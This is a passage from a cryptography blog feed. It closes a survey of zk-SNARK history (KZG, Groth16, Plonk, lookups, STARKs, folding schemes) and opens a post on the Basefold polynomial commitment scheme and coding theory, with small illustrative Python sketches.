&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.iacr.org&#x2F;archive&#x2F;asiacrypt2010&#x2F;6477178&#x2F;6477178.pdf&quot;&gt;Kate, Zaverucha, and Goldberg&lt;&#x2F;a&gt; introduced in 2010 a commitment scheme for polynomials using a bilinear pairing group. The commitment consists of a single group element, and the committer can efficiently open the commitment to any correct evaluation of the polynomial. Moreover, thanks to batching techniques, the opening can be done for several evaluations at once. KZG commitments provided one of the basic building blocks for several efficient SNARKs, such as Pinocchio, Groth16, and Plonk. It is also at the heart of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ethereum&#x2F;EIPs&#x2F;blob&#x2F;master&#x2F;EIPS&#x2F;eip-4844.md&quot;&gt;EIP-4844&lt;&#x2F;a&gt;. To get an intuition on batching techniques, you can see our post on the &lt;a href=&quot;&#x2F;mina-to-ethereum-bridge&#x2F;&quot;&gt;Mina-Ethereum bridge&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
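KZG openings rest on the algebraic fact that $p(z) = v$ exactly when $p(X) - v$ is divisible by $X - z$; the pairing check only verifies this identity "in the exponent". The following toy sketch checks the divisibility identity directly over a prime field (the modulus and polynomial are made up for illustration, and no pairing or elliptic curve is involved):

```python
P = 10**9 + 7  # prime modulus for the toy field (not a pairing-friendly curve)

def poly_eval(coeffs, x):
    # Horner evaluation of c0 + c1*x + ... over F_P (coefficients low to high)
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc

def divide_by_linear(coeffs, z):
    # synthetic division: p(X) = q(X)*(X - z) + r, with r = p(z)
    q = [0] * (len(coeffs) - 1)
    acc = 0
    for i in range(len(coeffs) - 1, 0, -1):
        acc = (acc * z + coeffs[i]) % P
        q[i - 1] = acc
    r = (acc * z + coeffs[0]) % P
    return q, r

p = [5, 0, 3, 1]               # p(X) = X^3 + 3X^2 + 5
z = 7
v = poly_eval(p, z)            # claimed evaluation v = p(z)
q, r = divide_by_linear(p, z)  # quotient q(X) and remainder r

t = 123456  # a random challenge point
assert r == v
# the opening identity: p(t) - v == q(t) * (t - z) for all t
assert (poly_eval(p, t) - v) % P == poly_eval(q, t) * (t - z) % P
```

In the actual scheme, the prover commits to `q` and the verifier checks the same identity at the secret setup point via one pairing equation.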
&lt;h2 id=&quot;practical-snarks-using-elliptic-curves&quot;&gt;Practical SNARKs using elliptic curves&lt;&#x2F;h2&gt;
&lt;p&gt;The first practical constructions for SNARKs appeared in 2013. These required a preprocessing step to generate the proving and verifying keys and were program&#x2F;circuit-specific. These keys could be quite large and depended on secret parameters that had to remain unknown to the parties; otherwise, proofs could be forged. Transforming code into something that could be proven required compiling it to a system of polynomial constraints. At first, this had to be done manually, which is time-consuming and error-prone. Advances in this area tried to address the main problems:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Have more efficient provers.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Reduce the amount of preprocessing.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Have universal rather than circuit-specific setups.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Avoid having trusted setups.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Develop ways to describe circuits using a high-level language, instead of writing the polynomial constraints manually.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;pinocchio-2013&quot;&gt;Pinocchio (2013)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2013&#x2F;279&quot;&gt;Pinocchio&lt;&#x2F;a&gt; is the first practical, usable zk-SNARK. The SNARK is based on quadratic arithmetic programs (QAP). The proof size was originally 288 bytes. Pinocchio’s toolchain provided a compiler from C code to arithmetic circuits, which was further transformed into a QAP. The protocol required that the verifier generate the keys, which are circuit-specific. It used elliptic curve pairings to check the equations. The asymptotics for proof generation and key setup were linear in the computation size, and the verification time was linear in the size of the public inputs and outputs.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;groth-16-2016&quot;&gt;Groth16 (2016)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2016&#x2F;260.pdf&quot;&gt;Groth&lt;&#x2F;a&gt; introduced a &lt;a href=&quot;&#x2F;groth16&#x2F;&quot;&gt;new argument of knowledge with increased performance&lt;&#x2F;a&gt; for problems described by an R1CS. It has the smallest proof size (only three group elements) and fast verification involving three pairings. It also involves a preprocessing step to obtain the structured reference string. The main drawback is that it requires a different trusted setup for each program we want to prove, which is inconvenient. Groth16 was used in Zcash.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;bulletproofs-ipa-2016&quot;&gt;Bulletproofs &amp;amp; IPA (2016)&lt;&#x2F;h3&gt;
&lt;p&gt;One of the weak points of the KZG PCS is that it requires a trusted setup. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2016&#x2F;263&quot;&gt;Bootle et al.&lt;&#x2F;a&gt; introduced an efficient zero-knowledge argument system for openings of Pedersen commitments that satisfy an inner product relation. The inner product argument has a linear prover, with logarithmic communication and interaction, but linear-time verification. They also developed a polynomial commitment scheme that does not require a trusted setup. PCSs based on these ideas are used by Halo 2 and Kimchi.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;sonic-marlin-and-plonk-2019&quot;&gt;Sonic, Marlin, and Plonk (2019)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2019&#x2F;099&quot;&gt;Sonic&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2019&#x2F;953&quot;&gt;Plonk&lt;&#x2F;a&gt;, and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2019&#x2F;1047&quot;&gt;Marlin&lt;&#x2F;a&gt; solve the problem of the trusted setup per program that we had in Groth16, by introducing universal and updatable structured reference strings. Marlin provides a proof system based on R1CS and is at the core of Aleo.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a href=&quot;&#x2F;all-you-wanted-to-know-about-plonk&#x2F;&quot;&gt;Plonk&lt;&#x2F;a&gt; introduced a new arithmetization scheme (later called Plonkish) and the use of the grand-product check for the copy constraints. Plonkish also allowed the introduction of specialized gates for certain operations, the so-called custom gates. Several projects have customized versions of Plonk, including Aztec, zkSync, Polygon ZKEVM, Mina’s Kimchi, Plonky2, Halo 2, and Scroll, among others.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;lookups-2018-2020&quot;&gt;Lookups (2018&#x2F;2020)&lt;&#x2F;h3&gt;
&lt;p&gt;Gabizon and Williamson introduced &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2020&#x2F;315&quot;&gt;plookup&lt;&#x2F;a&gt; in 2020, using the grand product check to prove that a value is included in a precomputed table. Though lookup arguments were previously presented in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2018&#x2F;380&quot;&gt;Arya&lt;&#x2F;a&gt;, that construction required determining the multiplicities for the lookups, which makes it less efficient. The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;086&quot;&gt;PlonkUp&lt;&#x2F;a&gt; paper showed how to introduce the plookup argument into Plonk. The problem with these lookup arguments was that they forced the prover to pay for the whole table, regardless of the number of lookups performed. This implies a considerable cost for large tables, and a lot of effort has been devoted to reducing the prover’s cost to just the lookups actually used.&lt;br &#x2F;&gt;
Haböck introduced &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1530&quot;&gt;LogUp&lt;&#x2F;a&gt;, which uses the logarithmic derivative to turn the grand-product check into a sum of reciprocals. LogUp is crucial for performance in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;toposware.medium.com&#x2F;beyond-limits-pushing-the-boundaries-of-zk-evm-9dd0c5ec9fca&quot;&gt;Polygon ZKEVM&lt;&#x2F;a&gt;, where the whole table needs to be split into several STARK modules. These modules have to be linked correctly, and cross-table lookups enforce this. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1284&quot;&gt;LogUp-GKR&lt;&#x2F;a&gt; uses the GKR protocol to increase the performance of LogUp. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;621&quot;&gt;Caulk&lt;&#x2F;a&gt; was the first scheme with prover time sublinear in the table size, using preprocessing time $\mathcal{O}(N \log N)$ and storage $\mathcal{O}(N)$, where $N$ is the table size. Several other schemes followed, such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1565&quot;&gt;Baloo&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1447&quot;&gt;flookup&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1763&quot;&gt;cq&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;957&quot;&gt;caulk+&lt;&#x2F;a&gt;. 
&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1216&quot;&gt;Lasso&lt;&#x2F;a&gt; presents several improvements, avoiding committing to the table if it has a given structure. Moreover, Lasso’s prover only pays for table entries accessed by the lookup operations. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1217&quot;&gt;Jolt&lt;&#x2F;a&gt; leverages Lasso to prove the execution of a virtual machine via lookups.&lt;&#x2F;p&gt;
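The logarithmic-derivative identity behind LogUp can be checked numerically: the sum of reciprocals over the looked-up values must equal the multiplicity-weighted sum of reciprocals over the table, at a random challenge. A toy sketch in Python, with made-up field and values:

```python
from collections import Counter

P = 2**31 - 1  # Mersenne prime, used here only as a toy field

def inv(a):
    # modular inverse via Fermat's little theorem
    return pow(a, P - 2, P)

def logup_check(f, t, x):
    # left side: one reciprocal 1/(x + f_i) per looked-up value
    lhs = sum(inv((x + fi) % P) for fi in f) % P
    # right side: one reciprocal per table entry, weighted by its
    # multiplicity m_j among the lookups
    m = Counter(f)
    rhs = sum(m[tj] * inv((x + tj) % P) for tj in t) % P
    return lhs == rhs

table = [1, 2, 3, 4]
lookups = [2, 2, 4, 1]                        # every value appears in the table
assert logup_check(lookups, table, x=123456)  # identity holds
assert not logup_check([5, 2], table, x=123456)  # 5 is not in the table
```

A cheating prover whose lookups fall outside the table fails this check for all but a negligible fraction of challenges `x`.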
&lt;h3 id=&quot;spartan-2019&quot;&gt;Spartan (2019)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2019&#x2F;550&quot;&gt;Spartan&lt;&#x2F;a&gt; provides an IOP for circuits described using R1CS, leveraging the properties of multivariate polynomials and the sumcheck protocol. Using a suitable polynomial commitment scheme, it results in a transparent SNARK with a linear time prover.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;hyperplonk-2022&quot;&gt;HyperPlonk (2022)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1355.pdf&quot;&gt;HyperPlonk&lt;&#x2F;a&gt; builds on the ideas of Plonk using multivariate polynomials. Instead of quotients to check the constraints’ enforcement, it relies on the sumcheck protocol. It also supports constraints of high degree without harming the prover’s running time. Since it relies on multivariate polynomials, there is no need to carry out FFTs, and the prover’s running time is linear in the circuit size. HyperPlonk introduces a new permutation IOP suitable for smaller fields and a sumcheck-based batch opening protocol, which reduces the prover’s work, the proof size, and the verifier’s time.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;folding-schemes-2008-2021&quot;&gt;Folding schemes (2008&#x2F;2021)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2021&#x2F;370&quot;&gt;Nova&lt;&#x2F;a&gt; introduces the idea of a folding scheme, which is a new approach to achieve incrementally verifiable computation (IVC). The concept of IVC dates back to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;iacr.org&#x2F;archive&#x2F;tcc2008&#x2F;49480001&#x2F;49480001.pdf&quot;&gt;Valiant&lt;&#x2F;a&gt;, who showed how to merge two proofs of length $k$ into a single proof of length $k$. The idea is that we can prove any long-running computation by recursively proving that the execution from step $i$ to step $i + 1$ is correct and verifying a proof that shows that the transition from step $i - 1$ to step $i$ was correct. Nova deals well with uniform computations; it was later extended to handle different types of circuits with the introduction of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1758&quot;&gt;Supernova&lt;&#x2F;a&gt;. Nova uses a relaxed version of R1CS and works over amicable elliptic curves. Working with amicable cycles of curves (for example, the Pasta curves) to achieve IVC is also used in Pickles, Mina’s main building block to achieve a succinct state. However, the idea of folding differs from recursive SNARK verification. The accumulator idea is more deeply connected to the concept of batching proofs. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2019&#x2F;1021.pdf&quot;&gt;Halo&lt;&#x2F;a&gt; introduced the notion of accumulation as an alternative to recursive proof composition. 
&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;620&quot;&gt;Protostar&lt;&#x2F;a&gt; provides a non-uniform IVC scheme for Plonk that supports high-degree gates and vector lookups.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;using-collision-resistant-hash-functions&quot;&gt;Using collision-resistant hash functions&lt;&#x2F;h2&gt;
&lt;p&gt;Around the same time that Pinocchio was developed, there were ideas to generate circuits&#x2F;arithmetization schemes that could prove the correctness of the execution of a virtual machine. Even though developing the arithmetization of a virtual machine could be more complex or less efficient than writing dedicated circuits for some programs, it offered the advantage that any program, no matter how complicated, could be proven by showing that it was executed correctly in the virtual machine. The ideas in TinyRAM were later improved with the design of the Cairo VM and subsequent virtual machines (such as zk-EVMs or general-purpose zkVMs). The use of collision-resistant hash functions removed the need for trusted setups or elliptic curve operations, at the expense of longer proofs.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;tinyram-2013&quot;&gt;TinyRAM (2013)&lt;&#x2F;h3&gt;
&lt;p&gt;In &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2013&#x2F;507&quot;&gt;SNARKs for C&lt;&#x2F;a&gt;, they developed a SNARK based on a PCP to prove the correctness of the execution of a C program, which is compiled to TinyRAM, a reduced instruction set computer. The computer used a Harvard architecture with byte-level addressable random-access memory. Leveraging nondeterminism, the circuit’s size is quasilinear in the size of the computation, efficiently handling arbitrary and data-dependent loops, control flow, and memory accesses.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;starks-2018&quot;&gt;STARKs (2018)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2018&#x2F;046&quot;&gt;STARKs&lt;&#x2F;a&gt; were introduced by Ben-Sasson et al. in 2018. They achieve $\mathcal{O}(\log^2 n )$ proof sizes with fast prover and verifier, do not require a trusted setup, and are conjectured to be post-quantum secure. They were first used by Starkware&#x2F;Starknet, together with the Cairo VM. Among their key introductions are the algebraic intermediate representation (AIR) and the &lt;a href=&quot;&#x2F;how-to-code-fri-from-scratch&#x2F;&quot;&gt;FRI protocol&lt;&#x2F;a&gt; (Fast Reed-Solomon Interactive Oracle Proof of Proximity). They are also used by other projects (Polygon Miden, Risc0, Winterfell, Neptune) or have seen adaptations of some components (zkSync’s Boojum, Plonky2, Starky).&lt;&#x2F;p&gt;
&lt;h3 id=&quot;ligero-2017&quot;&gt;Ligero (2017)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1608&quot;&gt;Ligero&lt;&#x2F;a&gt; introduces a proof system that achieves proofs whose size is $\mathcal{O}(\sqrt{n})$, where $n$ is the size of the circuit. It arranges the polynomial coefficients in matrix form and uses linear codes.&lt;br &#x2F;&gt;
&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2021&#x2F;1043&quot;&gt;Brakedown&lt;&#x2F;a&gt; builds on Ligero and introduces the idea of field-agnostic polynomial commitment schemes.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;some-new-developments&quot;&gt;Some new developments&lt;&#x2F;h2&gt;
&lt;p&gt;The use of different proof systems in production showed the merits of each approach and led to new developments. For example, Plonkish arithmetization offers a simple way to include custom gates and lookup arguments, and FRI has shown great performance as a PCS, leading to Plonky2. Similarly, the use of the grand product check in AIR (leading to randomized AIR with preprocessing) improved its performance and simplified memory access arguments. Commitments based on hash functions have gained popularity, owing to the speed of hash functions in hardware and the introduction of new SNARK-friendly hash functions.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;new-polynomial-commitment-schemes-2023&quot;&gt;New polynomial commitment schemes (2023)&lt;&#x2F;h3&gt;
&lt;p&gt;With the advent of efficient SNARKs based on multivariate polynomials, such as Spartan or HyperPlonk, there has been increased interest in new commitment schemes suited to this kind of polynomial. &lt;a href=&quot;&#x2F;snarks-on-binary-fields-binius&#x2F;&quot;&gt;Binius&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;917&quot;&gt;Zeromorph&lt;&#x2F;a&gt;, and &lt;a href=&quot;&#x2F;how-does-basefold-polynomial-commitment-scheme-generalize-fri&#x2F;&quot;&gt;Basefold&lt;&#x2F;a&gt; all propose new ways to commit to multilinear polynomials. Binius offers the advantage of having zero overhead to represent data types (whereas many proof systems use at least 32-bit field elements to represent single bits) and works over binary fields. Its commitment adapts Brakedown, which was designed to be field-agnostic. Basefold generalizes FRI to codes other than Reed-Solomon, leading to a field-agnostic PCS.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;customizable-constraint-systems-2023&quot;&gt;Customizable Constraint Systems (2023)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;552&quot;&gt;CCS&lt;&#x2F;a&gt; generalizes R1CS while capturing R1CS, Plonkish, and AIR arithmetization without overhead. Using CCS with the Spartan IOP yields SuperSpartan, which supports high-degree constraints without the prover incurring cryptographic costs that scale with the degree of the constraint. In particular, SuperSpartan yields a SNARK for AIR with a linear-time prover.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;This post describes the advances in SNARKs since their introduction in the mid-1980s. Advances in computer science, mathematics, and hardware, together with the introduction of blockchains, have led to new and more efficient SNARKs, opening the door for many applications that could transform our society. Researchers and engineers have proposed improvements and adaptations to SNARKs according to their needs, focusing on proof size, memory use, transparent setup, post-quantum security, prover time, and verifier time. While there were originally two main lines (SNARKs vs STARKs), the boundary between them has begun to fade as designers try to combine the advantages of different proof systems, for example, by pairing different arithmetization schemes with new polynomial commitment schemes. We can expect new proof systems to continue to appear with increased performance, and it will be hard for systems that are slow to adapt to keep up with these developments unless these tools can be used without changing core infrastructure.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>How does Basefold polynomial commitment scheme generalize FRI</title>
          <pubDate>Fri, 09 Feb 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-does-basefold-polynomial-commitment-scheme-generalize-fri/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-does-basefold-polynomial-commitment-scheme-generalize-fri/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-does-basefold-polynomial-commitment-scheme-generalize-fri/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;lambdaworks&lt;&#x2F;a&gt; is a library designed to provide efficient proof systems. We want it to support state-of-the-art provers and associated primitives so that people can use them to build new applications. Among those primitives are polynomial commitment schemes (PCS). These are a powerful cryptographic tool that allows us to bind ourselves to a given polynomial by means of a small data structure (such as the root of a Merkle tree or a point on an elliptic curve) and prove its evaluations at some points. Polynomial commitment schemes consist of the following five algorithms:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Setup: given a security parameter, $\lambda$, it generates the public parameters (pp) for the PCS.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Commit: taking the pp and a polynomial, $p$, outputs a commitment to the polynomial $\mathrm{cm}(p)$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Open: given the pp, a polynomial $p$ and a commitment to $p$, $\mathrm{cm}(p)$, checks whether $\mathrm{cm}(p)$ is the commitment to $p$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Prove evaluation: given the pp, a polynomial $p$, a point $z$ and a claimed evaluation $v$, outputs a proof $\pi$ that the $p(z) = v$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Verify evaluation: given the pp, the commitment to $p$, the proof $\pi$, the point $z$ and the claimed value $v$, checks whether the evaluation proof is valid.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Polynomial commitment schemes are one of the basic building blocks of modern SNARKs. Some commitment schemes require a trusted setup (such as &lt;a href=&quot;&#x2F;mina-to-ethereum-bridge&#x2F;&quot;&gt;KZG&lt;&#x2F;a&gt;), while others are transparent (such as FRI, Brakedown and IPA). Different PCS offer trade-offs between evaluation proof sizes, evaluation times, security assumptions, and other algebraic properties (for example, being additively homomorphic).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1705.pdf&quot;&gt;Basefold&lt;&#x2F;a&gt; generalizes the &lt;a href=&quot;&#x2F;how-to-code-fri-from-scratch&#x2F;&quot;&gt;FRI commitment scheme&lt;&#x2F;a&gt; to other codes different from Reed-Solomon. These codes need to have certain properties, though. This post will discuss the basics of coding theory and explain how basefold works.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;coding-theory&quot;&gt;Coding theory&lt;&#x2F;h2&gt;
&lt;p&gt;Error-correcting codes are ways of representing data so that we can recover the information even if parts of it were corrupted. We do this by introducing redundancy, and the message can be recovered even if parts of the redundant data are corrupted. There is a trade-off between maximizing error correction and redundancy: codes with higher redundancy should be able to tolerate a higher number of errors.&lt;&#x2F;p&gt;
&lt;p&gt;A code of block length $n$ over an alphabet $\Sigma$ is a subset of $\Sigma^n$. In our case, we will be interested in codes where the alphabet $\Sigma$ is some finite field $\mathbb{F}$ and $\vert \Sigma \vert = q$.&lt;&#x2F;p&gt;
&lt;p&gt;The rate of a code of dimension $k$ and block size $n$ is given by $\rho = k &#x2F; n$ and is a measure of the amount of redundancy introduced in the code.&lt;&#x2F;p&gt;
&lt;p&gt;The Hamming distance between two codewords is the number of positions at which they differ; the distance $d$ of a code is the minimum Hamming distance between any two distinct codewords. The relative distance is the ratio between the distance and the block length, $\delta = d &#x2F; n$.&lt;&#x2F;p&gt;
&lt;p&gt;A code over $\Sigma^n$ of dimension $k$ and distance $d$ is called an $(n , k , d )_{\Sigma}$ - code. A linear code is such that any linear combination of codewords results in a codeword (that is, if $c_0$ and $c_1$ are the encoding of $m_0$ and $m_1$, then $\alpha_0 c_0 + \alpha_1 c_1$ is also a codeword, specifically, the codeword associated with $\alpha_0 m_0 + \alpha_1 m_1$).&lt;&#x2F;p&gt;
&lt;p&gt;For linear codes, the encoding function can be represented as a vector-matrix product using a generator matrix, $G$, that is&lt;br &#x2F;&gt;
$\mathrm{Enc}(v) = v \cdot G$&lt;&#x2F;p&gt;
&lt;p&gt;For example, Reed-Solomon codes use a Vandermonde matrix with points $\alpha_0, \alpha_1, … , \alpha_{n - 1}$:&lt;br &#x2F;&gt;
$$\begin{align}&lt;br &#x2F;&gt;
V(\alpha_0 , \alpha_1 , … , \alpha_{n - 1}, k)_{i,j} = \alpha_j^i&lt;br &#x2F;&gt;
\end{align}$$&lt;&#x2F;p&gt;
&lt;p&gt;Reed-Solomon codes work by interpreting the message as the coefficients of a degree $k - 1$ polynomial. If the message is $(m_0 , m_1 , … , m_{k - 1})$, we can think of it as $m_0 + m_1 x + … + m_{k - 1} x^{ k - 1}$ and provide the evaluations over $n$ distinct points. The difference of two distinct codewords corresponds to a nonzero polynomial of degree at most $k - 1$, which has at most $k - 1$ zeros, so two different codewords coincide in at most $k - 1$ places and $d = n - k + 1$. Codes which satisfy $d = n - k + 1$ are called maximum distance separable (MDS) codes.&lt;&#x2F;p&gt;
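&lt;p&gt;The following short Python sketch (our own toy example, with an arbitrarily chosen field $\mathbb{F}_{97}$ and evaluation points) encodes a message by evaluating its polynomial at $n$ distinct points and checks that two distinct codewords differ in at least $d = n - k + 1$ positions, as the MDS bound predicts.&lt;&#x2F;p&gt;

```python
# Our own toy Reed-Solomon encoder over F_97: the message gives the
# coefficients of a polynomial of degree at most k - 1, and the codeword
# is its evaluation at n distinct points (a Vandermonde product).
p = 97
k, n = 3, 6
alphas = [1, 2, 3, 4, 5, 6]          # n distinct evaluation points

def encode(msg):
    # codeword[j] = m_0 + m_1 * a_j + ... + m_{k-1} * a_j^{k-1}  (mod p)
    return [sum(m * pow(a, i, p) for i, m in enumerate(msg)) % p
            for a in alphas]

c0 = encode([1, 2, 3])
c1 = encode([1, 2, 4])
# Distinct codewords differ in at least d = n - k + 1 = 4 positions,
# i.e. they agree in at most k - 1 = 2 positions (the MDS bound).
differences = sum(x != y for x, y in zip(c0, c1))
assert differences >= n - k + 1
```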
&lt;h2 id=&quot;basefold&quot;&gt;Basefold&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=OuKUqPbHLQ0&quot;&gt;Basefold&lt;&#x2F;a&gt; works with foldable linear codes. Remember that we can represent linear codes via the generator matrix, $G$. The generator matrix, $G_{k , n}$ of the foldable linear $(n, k, d )$ - code has the following block matrix structure:&lt;br &#x2F;&gt;
$$G_{k,n} = \begin{bmatrix}&lt;br &#x2F;&gt;
G_{k&#x2F;2,n&#x2F;2} &amp;amp; G_{k&#x2F;2,n&#x2F;2} \newline&lt;br &#x2F;&gt;
